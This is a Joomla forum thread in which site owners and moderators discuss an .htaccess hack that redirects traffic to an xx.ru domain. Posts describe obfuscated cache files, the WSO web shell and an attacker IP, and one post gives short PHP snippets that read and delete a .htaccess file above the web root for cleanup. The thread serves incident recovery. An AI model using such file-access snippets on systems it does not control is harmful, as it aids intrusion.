It appears to be fixed now. I can type in an incorrect site url & I get the correct 404 page. I will post back here if the problem reoccurs. I am about to delete the renamed _cache_iccizijj.php file.
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: htaccess hacked, re-directing traffic to xx.ru
As previously stated many times by several people. Deleting a few files is no good. The only way to be certain to be rid of all the infected files is to delete every folder/file in on the server.
Giving advice to the contrary is ill advised.
Giving advice to the contrary is ill advised.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 6
- Joined: Tue Feb 17, 2009 11:15 am
Re: htaccess hacked, re-directing traffic to xx.ru
yaanimai - thanks for your post! I think I have fixed my site also. I too found a similar file you mentioned in the tmp sub directory - mine called _cache_ldxmbzqi.php. Again had Vbulletin references and a load of what looks like encrypted code. I was happy to delete it as I have no VBulletin installs. After deleting this file and cleaning up three .htaccess file my site has been back to normal for a couple of hours and without new code injected into the .htaccess files. Will monitor and report back.
Just need to know how it got there in the first place......
Cheers
Andy
Just need to know how it got there in the first place......
Cheers
Andy
-
- Joomla! Apprentice
- Posts: 6
- Joined: Tue Feb 17, 2009 11:15 am
Re: htaccess hacked, re-directing traffic to xx.ru
Interestingly from my logs there has been someone from IP address 188.190.127.71 trying to access the above file. Somewhere in the Ukraine called Infium host
Someone send the boys round.....
Someone send the boys round.....
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: htaccess hacked, re-directing traffic to xx.ru
And we all know what thought didandysdp wrote:.... I think I have fixed my site also. I too found a similar file you mentioned in the tmp sub directory - mine called _cache_ldxmbzqi.php. ...
Unless you delete all the folders/files on the server then you are still infected. It is not just the .htaccess that is being infected with the redirect code. Images and legitimate files are also being infected.
Once access is gained to your server then various files are loaded onto your server.
What is your url ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 6
- Joined: Tue Feb 17, 2009 11:15 am
Re: htaccess hacked, re-directing traffic to xx.ru
http://www.1stlinslade. org.uk this is the older 1.5.23 site which is live to our members. The updated 2.5.4 site is sitting in http://www.1stlinslade. org.uk/jupgrade until I have completed all my changes.
Webdongle - I bow to your greater knowledge and will take onboard any further advice. In simple terms what do you suggest I do next. Wiping and starting again sounds like an unenviable task! Especially after spending time adjusting the JA-Purity template which was core in 1.5 and now not core in 2.5! As I have said earlier I have been running Joomla for many years, and this is hobby done in spare time for my Scout Group - I'm not a programmer! Is there any easy to follow guide for deleting folders/files while keeping all content intact - has the database been infected? How can I assess the extent of infection?
Many thanks for your help
Andy
Webdongle - I bow to your greater knowledge and will take onboard any further advice. In simple terms what do you suggest I do next. Wiping and starting again sounds like an unenviable task! Especially after spending time adjusting the JA-Purity template which was core in 1.5 and now not core in 2.5! As I have said earlier I have been running Joomla for many years, and this is hobby done in spare time for my Scout Group - I'm not a programmer! Is there any easy to follow guide for deleting folders/files while keeping all content intact - has the database been infected? How can I assess the extent of infection?
Many thanks for your help
Andy
Last edited by mandville on Tue Apr 03, 2012 5:36 pm, edited 1 time in total.
Reason: broke link
Reason: broke link
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: htaccess hacked, re-directing traffic to xx.ru
@andysdp
Told you so, scanned a few minutes ago Now will you please stop saying its fixed by deleting just a few files ? That sort of comment only allows others to falsely think their sites are safe by doing the same.
Again I say
As previously stated many times by several people. Deleting a few files is no good. The only way to be certain to be rid of all the infected files is to delete every folder/file in on the server.
Giving advice to the contrary is ill advised.
Told you so, scanned a few minutes ago Now will you please stop saying its fixed by deleting just a few files ? That sort of comment only allows others to falsely think their sites are safe by doing the same.
Again I say
As previously stated many times by several people. Deleting a few files is no good. The only way to be certain to be rid of all the infected files is to delete every folder/file in on the server.
Giving advice to the contrary is ill advised.
You do not have the required permissions to view the files attached to this post.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 6
- Joined: Tue Feb 17, 2009 11:15 am
Re: htaccess hacked, re-directing traffic to xx.ru
@webdongle
Thanks for your reply. I missed a couple of .htaccess files! Thanks for info on the scanning site - just re-scanned both my 1.5.23 and 2.5.4 sites and it is reporting clear now, which is a relief - see screenshots.
Thanks Andy
Thanks for your reply. I missed a couple of .htaccess files! Thanks for info on the scanning site - just re-scanned both my 1.5.23 and 2.5.4 sites and it is reporting clear now, which is a relief - see screenshots.
Thanks Andy
You do not have the required permissions to view the files attached to this post.
- kurchania
- Joomla! Hero
- Posts: 2070
- Joined: Mon Sep 21, 2009 6:56 am
- Location: indore,india
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
@andysdp
the site is hacked using wso2.5 web shell secript which replace all the htaccess of root folder.this script can give access to all file.
if you are affected please review the htaccess folder of the subdomain and folder which contain htacces.
Please review tmp folder. you can find the cache_ file there with preg replace again.
remember the date on which this script is uploaded in the server.
if this is shared hosting please consult with your hosting provider because one domain can affect all the sub domains. mean file present in any other domain in shared hosting can access your code also.
also better search in log file when this file is inserted in the server.ask your hosting provider to restore the backup before this date and then update everything
Regards
Abhijeet
the site is hacked using wso2.5 web shell secript which replace all the htaccess of root folder.this script can give access to all file.
if you are affected please review the htaccess folder of the subdomain and folder which contain htacces.
Please review tmp folder. you can find the cache_ file there with preg replace again.
remember the date on which this script is uploaded in the server.
if this is shared hosting please consult with your hosting provider because one domain can affect all the sub domains. mean file present in any other domain in shared hosting can access your code also.
also better search in log file when this file is inserted in the server.ask your hosting provider to restore the backup before this date and then update everything
Regards
Abhijeet
abhijeet kurchania
The future depends on what you do today
The future depends on what you do today
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: htaccess hacked, re-directing traffic to xx.ru
Or those files got infected after you looked at them beforeandysdp wrote:I missed a couple of .htaccess files! Thanks for info on the scanning site -...
Did the 1.5.23 site not throw out a warning of old software ? That site is likely to be infected again !andysdp wrote:... just re-scanned both my 1.5.23 and 2.5.4 sites and it is reporting clear now,
Have you checked all the extensions are up to date and not on the VEL ?
Have you checked all computers with admin/ftp access and with how many anti malware/antivirus programs ?
To be sure perhaps run the Forum Post Assistant on both sites and post the results here ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
- mandville
- Joomla! Master
- Posts: 15150
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: htaccess hacked, re-directing traffic to xx.ru
kurchania - thanks for showing up so late at the party, sorry you havent had time to read the topic or the post you are answeering which clearly says his site is now fixed.
your attempt to be helpful by retelling the canteen gossip is unfortunately badly placed.
as we have mentioned before to "certain" people, please read the full topic then post considerately and helpfully, and dont confuse .
Summary of this topic so far.
* affects all hosts and server configurations
* is not joomla specific (vb/wp/drup/html sites all report issues)
procedure to repair
see the forum sticky Before you post : read and action this
concentrate on http://docs.joomla.org/Security_Checklist_7 with specific attention to http://docs.joomla.org/Security_Checkli ... ter_relief
and http://docs.joomla.org/Security_Checkli ... d_and_cron
suggestion: create a htaccess file in the tmp folder with the code from http://docs.joomla.org/Security_Checkli ... ermissions to attempt to hamper attacks
your attempt to be helpful by retelling the canteen gossip is unfortunately badly placed.
it is known by many names, some listed in this topickurchania wrote:@andysdp
the site is hacked using wso2.5
as listed in the http://forum.joomla.org/viewtopic.php?f=621&t=582854 and quoted many times in this topic along with the rest of the info you provided.if you are affected please review the htaccess folder of the subdomain and folder which contain htacces.
as we have mentioned before to "certain" people, please read the full topic then post considerately and helpfully, and dont confuse .
Summary of this topic so far.
* affects all hosts and server configurations
* is not joomla specific (vb/wp/drup/html sites all report issues)
procedure to repair
see the forum sticky Before you post : read and action this
concentrate on http://docs.joomla.org/Security_Checklist_7 with specific attention to http://docs.joomla.org/Security_Checkli ... ter_relief
and http://docs.joomla.org/Security_Checkli ... d_and_cron
suggestion: create a htaccess file in the tmp folder with the code from http://docs.joomla.org/Security_Checkli ... ermissions to attempt to hamper attacks
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- kurchania
- Joomla! Hero
- Posts: 2070
- Joined: Mon Sep 21, 2009 6:56 am
- Location: indore,india
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
@mandville,
I cleaned the files on 19 last month and 2 days ago the site is infected with big red screen.so I post.
I apology if this look like canteen gossip that some shell script is running freely on shared server hosting which have privilege to affect all the domains/permission/Database/Brutal attack.
I cleaned the files on 19 last month and 2 days ago the site is infected with big red screen.so I post.
I apology if this look like canteen gossip that some shell script is running freely on shared server hosting which have privilege to affect all the domains/permission/Database/Brutal attack.
abhijeet kurchania
The future depends on what you do today
The future depends on what you do today
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: htaccess hacked, re-directing traffic to xx.ru
Looks like you have holes in your security that lets them in. Or never deleted all your files.kurchania wrote:...
I cleaned the files on 19 last month and 2 days ago the site is infected with big red screen.so I post....
Please use the Forum Post Assistant and post the results here. Also the site in the form of www.site dot com
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
- leolam
- Joomla! Master
- Posts: 20652
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
A very easy written article on the htaccess hacks can be found here: http://www.squidoo.com/htaccess-hacked
Leoit relies on either a website with poor protection or the use of the ftp password. They normally obtain this from a Trojan virus on your system.
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
-
- Joomla! Fledgling
- Posts: 4
- Joined: Sun Mar 11, 2012 7:27 pm
Re: htaccess hacked, re-directing traffic to xx.ru
- It seems to me it could be an automatic attack for the wide range of hosts affected in a very similar way, so if anyone has any details it will probably apply to others as well;
- Vulnerability used (previously unknown) was:
http://www.nonumber.nl/news/releases/28 ... extensions
- Vulnerability used (previously unknown) was:
http://www.nonumber.nl/news/releases/28 ... extensions
-
- Joomla! Fledgling
- Posts: 4
- Joined: Sun Mar 11, 2012 7:27 pm
Re: htaccess hacked, re-directing traffic to xx.ru
Some more info about godaddy (all files removed by 404 not found still redirects to attackers site) issues:
Apparently there is something above 'root directory'. It isn't accessible from FTP or FTP*File manager, but it is still there. Attack put .htaccess in there and ErrorDocument apache directives in there applied.
To check that I used the following php code placed into root:
and to remove:
Apparently there is something above 'root directory'. It isn't accessible from FTP or FTP*File manager, but it is still there. Attack put .htaccess in there and ErrorDocument apache directives in there applied.
To check that I used the following php code placed into root:
Code: Select all
<?php
readfile('../.htaccess');
Code: Select all
<?php
unlink('../.htaccess');
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
I have said that several times in several posts here. The hack PLACES A COPY of the hacked htaccess file with the redirects in it above publicly accessible directories. This file needs to be found and removed as htaccess files do not belong outside of a publicly accessible area. The hacking put it there and they can access this file by way of the additional files placed within the publicly accessible areas of your site. When I mention publicly accessible areas, I mean where normal site (Joomla) files are installed. This is usually public_html, but some hosts call this area www, htdocs, or something similar
PhilD
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: htaccess hacked, re-directing traffic to xx.ru
Hi PhilD
With shared Hosting(as I'm sure you know) there are different ways the ftp folders are organised.
With shared Hosting(as I'm sure you know) there are different ways the ftp folders are organised.
- On some packages ftp Access is to the folder above public_htm.
Are you saying a .htaccess is being placed above that directory ? - Some shared hosting have the ftp to inside the public_htm. Are you saying the .htaccess file is being placed in the folder above public_htm even though ftp access is not allowed above it ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".